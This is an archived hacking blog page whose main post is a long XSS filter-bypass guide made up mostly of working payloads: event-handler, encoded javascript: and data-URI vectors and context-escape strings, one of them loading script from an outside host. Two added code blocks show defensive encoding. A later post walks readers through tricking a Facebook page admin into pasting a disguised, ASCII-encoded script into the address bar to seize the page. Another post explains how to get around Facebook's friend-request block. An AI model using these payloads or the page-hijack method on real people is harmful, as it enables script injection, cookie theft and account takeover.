Showing posts with label hacking. Show all posts

Oct 9, 2014

Bypass WAF XSS Filters

This article is taken from the XSS filter bypass section of "Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters". The earlier part of that paper covers fingerprinting the WAF to decide which tests can be skipped; the part that follows concentrates on a basic XSS testing process. Although it is written around WAFs, the testing methods target defects in the WAF's regular expressions rather than protocol-level issues, so they carry over to XSS filters in other scenarios. It is also a fairly easy way for novices to quickly learn some of the basic methods of testing for XSS.


Bypassing Blacklists
Most sites filter input using blacklists. There are three ways to test for a blacklist bypass:
1> Brute force (submit a large number of payloads and look at the results)
2> Infer the regular expressions in use
3> Use a browser bug

Preliminary tests

1) Try inserting ordinary HTML tags such as <b>, <i>, <u> and see how they come back in the page: whether they are HTML-encoded or the tags are filtered out.
2) Try inserting unclosed tags, for example <b, <i, <u, <marquee, and check the response to see whether unclosed tags are filtered as well.
3) Then test a few XSS payloads that basically every XSS filter will filter:
<script>alert(1);</script>
<script>prompt(1);</script>
<script>confirm(1);</script>
<script src="http://rhainfosec.com/evil.js">
Check whether the response has everything filtered or only part of it. If the words alert, prompt and confirm are left behind, try a mixed-case combination:
<ScRiPt>alert(1);</scrIPt>
4) If the filter only strips out the <script> and </script> tags, you can get around it with
<scr<script>ipt>alert(1)</scr<script>ipt>
so that once the <script> tag is filtered out, what is left joins up to form a complete payload.
5) Test with the <a href tag and look at the response that comes back:
<a href="http://www.google.com">Clickme</a>
Check whether the <a tag is filtered, whether href is filtered, and whether the data inside href is filtered.
If none of the data is filtered, insert the javascript protocol and look again:
<a href="javascript:alert(1)">Clickme</a>
Check whether an error is returned, and whether the entire content of the javascript protocol has been filtered out or only the word javascript; then try changing the case.
Continue by testing event handlers that trigger javascript execution:
<a href="rhainfosec.com" onmouseover=alert(1)>ClickHere</a>
See whether the onmouseover event is filtered. Then test an invalid event to observe the filtering rule:
<a href="http://www.madleets.com" onclimbatree=alert(1)>ClickHere</a>
See whether it comes back intact or is stripped out just like onmouseover.
If it comes back intact, the filter uses a blacklist of events. In HTML5 there are more than 150 ways to execute javascript code, so test a rarely used event:
<body/onhashchange=alert(1)><a href=#>clickit
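
Why the vector in step 4 survives a filter that deletes tags in a single pass, and why repeating the deletion still lets other tags through while output encoding does not. This is an added example, not code from the original article; the function names and the simple markup check are illustrative assumptions.

```javascript
// Added example: two deletion-based blacklist filters compared with output encoding.
// SAMPLES are vectors quoted in this article; all function names are illustrative.
const SAMPLES = [
  "<ScRiPt>alert(1);</scrIPt>",
  "<scr<script>ipt>alert(1)</scr<script>ipt>",
  "<img src=x onerror=prompt(1);>",
];

// Weak filter 1: delete <script> and </script> in a single pass, any case.
function stripOnce(input) {
  return input.replace(/<\/?script>/gi, "");
}

// Weak filter 2: repeat the deletion until the string stops changing.
function stripUntilStable(input) {
  let prev;
  do {
    prev = input;
    input = stripOnce(input);
  } while (input !== prev);
  return input;
}

// Output encoding: nothing is deleted; markup characters become inert text.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Crude check for this demo: does a "<" followed by a tag name or "/" survive?
function stillHasMarkup(output) {
  return /<[a-z\/]/i.test(output);
}

// For each sample, report whether markup survives each treatment.
function compareFilters() {
  return SAMPLES.map((s) => ({
    input: s,
    afterStripOnce: stripOnce(s),
    stripOnce: stillHasMarkup(stripOnce(s)),
    stripUntilStable: stillHasMarkup(stripUntilStable(s)),
    escapeHtml: stillHasMarkup(escapeHtml(s)),
  }));
}

console.table(compareFilters());
```

Only the encoding column is false for every sample: deletion either reassembles the tag or never matches tags outside the blacklist.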

Testing other tags

Next, test other tags and attributes.

src attribute

<img src=x onerror=prompt(1);>
<img/src=aaa.jpg onerror=prompt(1);>
<video src=x onerror=prompt(1);>
<audio src=x onerror=prompt(1);>

iframe tag

<iframe src="javascript:alert(2)">
<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

embed tag

<embed/src=//goo.gl/nlX0P>

action attribute

Use the action attribute of <form, <isindex and other tags to execute javascript:

<form action="Javascript:alert(1)"><input type=submit>
<isindex action="javascript:alert(1)" type=image>
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
<isindex action=data:text/html, type=image>
<form action='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK

formaction attribute

<isindex formaction="javascript:alert(1)" type=image>
<input type="image" formaction=JaVaScript:alert(0)>
<form><button formaction=javascript&colon;alert(1)>CLICKME

background attribute

<table background=javascript:alert(1)></table> // effective in Opera 10.5 and IE6

poster attribute

<video poster=javascript:alert(1)//></video> // effective in Opera 10.5 and below

data attribute

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<object/data=//goo.gl/nlX0P?

code attribute

<applet code="javascript:confirm(document.cookie);"> // effective in Firefox
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>

Event triggers

<svg/onload=prompt(1);>
<marquee/onstart=confirm(2)>/
<body onload=prompt(1);>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">

The shortest test vectors

<q/oncut=open()>
<q/oncut=alert(1)> // very effective where the input length is limited

Nesting

<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
<body language=vbs onload=alert-1 // effective in IE8
<command onmouseover="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command> // effective in IE8

When parentheses are filtered

When parentheses are filtered, you can use throw to bypass the filter:
<a onmouseover="javascript:window.onerror=alert;throw 1>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
In Chrome and IE these two test vectors produce an "uncaught" error, so you can use the following vector instead:
<body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29';>

expression attribute

<img style="xss:expression(alert(0))"> // IE7 and below
<div style="color:rgb(''&#0;x:expression(alert(1))"></div> // IE7 and below
<style>#test{x:expression(alert(/XSS/))}</style> // IE7 and below

location attribute

<a onmouseover=location='javascript:alert(1)'>click
<body onfocus="location='javascript:alert(1)'">123

Some other payloads

<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P">
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg>
<svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>
<svg><![CDATA[><image xlink:href="]]><img/src=xx:x onerror=alert(2)//"></svg>
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click

When = ( ) ; : are filtered

<svg><script>alert&#40/1/&#41</script> // works in all browsers
In Opera the tags can be left unclosed:
<svg><script>alert&#40 1&#41 // Opera, to be investigated

Entity encoding

In many cases the WAF will entity-encode the user's input.
javascript is a very flexible language and many encodings can be used with it, such as Hex, Unicode and HTML. However, each of these encodings only works in certain positions:
Attributes:
href=
action=
formaction=
location=
on*=
name=
background=
poster=
src=
code=
Supported encodings: HTML, octal, decimal, hexadecimal and Unicode
Attributes:
data=
Supported encoding: base64

Filtering based on context

The biggest problem with a WAF is that it does not know the context in which the input ends up in the output, so it can be bypassed in specific contexts.

Input inside an attribute

<input value="XSStest" type=text>
The controllable position is XSStest, so you can use
"><img src=x onerror=prompt(0);>
If <> are filtered, you can use this instead:
" autofocus onfocus=alert(1)//
Similarly, there are many other payloads:
" onmouseover="prompt(0) x="
" onfocusin=alert(1) autofocus x="
" onfocusout=alert(1) autofocus x="
" onblur=alert(1) autofocus a="

Input inside a script tag

For example:
<script>
var x = "Input";
</script>
The controllable position is Input. You can close the script tag to insert code, but simply closing the double quote is also enough to execute js code:
";alert(1)//
The end result is
<script>
var x = "";alert(1)//
</script>

Unconventional event listeners

For example:
";document.body.addEventListener("DOMActivate",alert(1))//
";document.body.addEventListener("DOMActivate",prompt(1))//
";document.body.addEventListener("DOMActivate",confirm(1))//
The following are some events of the same category:
DOMAttrModified
DOMCharacterDataModified
DOMFocusIn
DOMFocusOut
DOMMouseScroll
DOMNodeInserted
DOMNodeInsertedIntoDocument
DOMNodeRemoved
DOMNodeRemovedFromDocument
DOMSubtreeModified

HREF content controllable

For example:
<a href="Userinput">Click</a>
The controllable part is Userinput; all we need to do there is enter javascript code such as:
javascript:alert(1)//
The final combination is:
<a href="javascript:alert(1)//">Click</a>

Transformations

Use HTML entity or URL encoding to bypass the blacklist; entities inside href are decoded automatically. If all else fails, you can try vbscript, which is valid in IE10 and below, or use the data protocol.

JavaScript transformation

When using the javascript protocol, the following forms can be used:
javascript&#00058;alert(1)
javaSCRIPT&colon;alert(1)
JaVaScRipT:alert(1)
javas&Tab;cript:\u0061lert(1);
javascript:\u0061lert&#x28;1&#x29
javascript&#x3A;alert&lpar;document&period;cookie&rpar;

Vbscript transformation

vbscript:alert(1);
vbscript&#00058;alert(1);
vbscr&Tab;ipt:alert(1)"

Data URL

data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
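
The three output contexts described above (attribute value, script string, href) each need their own encoder, and the href check has to survive the case, tab and scheme transformations just listed. The following is an added example, not code from the original article; the function names, the scheme allowlist and the placeholder base URL are assumptions.

```javascript
// Added example: one encoder per output context (all names are illustrative).
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Quoted HTML attribute value, e.g. <input value="...">.
function encodeHtmlAttr(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// String literal inside <script>: JSON.stringify escapes quotes and backslashes;
// <, >, & and U+2028/2029 are then \u-escaped so "</script>" cannot end the block.
function encodeJsString(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// href value: let the URL parser normalise case, tabs and leading whitespace,
// then allow only listed schemes. The base URL is a placeholder for relative links.
const SAFE_SCHEMES = new Set(["http:", "https:", "mailto:"]);
function safeHref(value) {
  let url;
  try {
    url = new URL(String(value), "https://base.invalid/");
  } catch {
    return "#";
  }
  return SAFE_SCHEMES.has(url.protocol) ? encodeHtmlAttr(value) : "#";
}

// The three templates used as examples in this article, rendered with encoding.
function render(userInput) {
  return {
    attribute: `<input value="${encodeHtmlAttr(userInput)}" type=text>`,
    script: `<script>var x = ${encodeJsString(userInput)};</script>`,
    href: `<a href="${safeHref(userInput)}">Click</a>`,
  };
}

console.log(render('";alert(1)//'));
console.log(render("javas\tcript:alert(1)"));
```

Because the href value is attribute-encoded after the scheme check, an input such as javascript&colon;alert(1) reaches the browser with its ampersand escaped, so the entity is never decoded into a colon.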

JSON

When your input is displayed inside encodeURIComponent, it is very easy to insert xss code:
encodeURIComponent('userinput')
userinput is controllable; test code:
-alert(1)-
-prompt(1)-
-confirm(1)-
The end result:
encodeURIComponent("-alert(1)-")
encodeURIComponent("-prompt(1)-")

SVG tag

When the result is returned inside an svg tag, there is a special feature:
<svg><script>var myvar="YourInput";</script></svg>
YourInput is the controllable input:
www.site.com/test.php?var=text";alert(1)//
Even if the " is entity-encoded, it can still execute:
<svg><script>var myvar="text&quot;;alert(1)//";</script></svg>

Browser bug

Charset bugs have appeared in IE many times. The first was UTF-7, but that only works in older versions; here we discuss one that can execute javascript in present-day browsers.
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS
On this page we control the character set of the current page. When we run our usual test:
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v="><img src=x onerror=prompt(0);>
the returned result shows that the double quote was encoded:
<html>
<meta charset="utf-8"></meta>
<body>
<input type="text" value="&quot;&gt;&lt;img src=x onerror=prompt(0);&gt;"></input>
</body>
</html>
Set the character set to UTF-32:
http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
The above executes successfully in IE9 and below.
Bypassing with a null byte:
<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
Effective in IE9 and below.

Sep 20, 2014

Change Your Windows 7 Start Button With any Picture


Steps For Trick

1. First download the tools from here.


2. Extract it and run it as Administrator.
3. Check Enable Start Orb Loader.
4. Click Browse and browse for the folder in which your start orb bitmaps are.

5. Select your desired orb from the orb list.
6. If you want to access the app directly from your desktop context menu, click Shell integration.

7. Click Save Changes.

Now your start button will be changed. Just log off and log in to see the new orb.

Post Your Blog Posts To Your Facebook Wall Automatically

A WordPress plugin that lets you cross-post your blog posts to your Facebook Wall. Your Facebook "Boxes" tab will show your most recent blog posts.

Friend Request Blocked? Send Friend Request When Blocked For 30 or 7 Days

Now you can send friend requests even when Facebook has blocked you from sending them for 7 or 30 days.
Steps To Send Friend Request When Blocked
1. Get the person's email address first. Come on guys, it's not so difficult.
2. Visit Add Personal Contacts as Friends.
3. Here you can send a friend request even if you are blocked, by using their email address.
4. If you want to send friend requests to lots of friends, here is a quick and easy way to do this.
5. Open up a new notepad file and paste all your friends' email addresses separated by commas (,).
6. Save the notepad file with the extension .vcf
7. This is your contact file containing your friends' email addresses.
8. Visit the Facebook page to add your vcf file.
9. Go to Add Personal Contacts as Friends and click on the last option, other tools; there you can find upload contact file.
10. Browse to your .vcf file and upload it to the Facebook link given above.
11. It will send requests to your friends by email automatically.
Just to make sure this method really works when you are blocked, I went ahead and got myself blocked for 2 days, and tried the above steps. Yep, you guessed it right. It did work for me and I was able to send 3 requests at the same time using the .vcf file.
Congo! 


Sep 18, 2014

Facebook Page Hacking


Today I am getting a lot of complaints about Facebook Page Hacking from readers.
It is very easy to hack a Facebook Page, but also very hard without my article. However, it's a simple Facebook bug which helps the admins to remove another admin. However, Facebook should set up a rule that the original admins should not be removed.

However, it's quite strange to see that, according to the Facebook help page, the primary or original admin cannot be removed. However, that's untrue, which gives rise to the whole idea of hijacking Facebook fan pages.
Let's Go...
Things we shall need:

1.  Hack Facebook page exploit.
2. A free hosting.
3. A key or script to run that "Facebook page hacking exploit.".
4. Your Facebook email id.
5. Brain ( A bit ;) )

I will try to be simple, but if you don't get anything then kindly ask at comment below.

1. Facebook Admin Page Hacking Exploit:

a) Editing the facebook admin page hack exploit:

First of all see your facebook email id which you used to signup at facebook, see pic below that's the pic of exploit:
Now change the highlighted id to your's facebook id.

2. Get free hosting:

Well t35 and 110mb won't help you in this hack :P better go to 000webhost.com and 0fees.net. 

Upload the exploit and I recommend change its name from pagehack.js to fanbooster.js or something more attracting.

3. Using the exploit by Key or script: 

There will be a text file in the downloaded package, named as Key for pagehack.txt open it, You will get a script in it, Now the main thing is social engineering, its up to you that how you give him key, Well Change the following part in the key to your own script path:
Change this to your hosting , and also change the exploit name in this key if you have changed it while uploading as suggesting.


Tip: Encode this in ASCII format, Victim might not know what is this.

Now, Give the key to victim (He must be admin of page) and ask him to paste this in browser address bar


Tip: Tell him that it will make your page safe, or something else like attracting

When he will put this key in address bar and that's it you will get a notification that you are admin of his page now.

Enjoy the Facebook Admin Page Hack, But don't hack for bad cause.

Download this exploit from the link below.
Now, after downloading it, you will get the key inside it as well as the exploit.
First we have to edit it, and you will easily understand the rest of the things.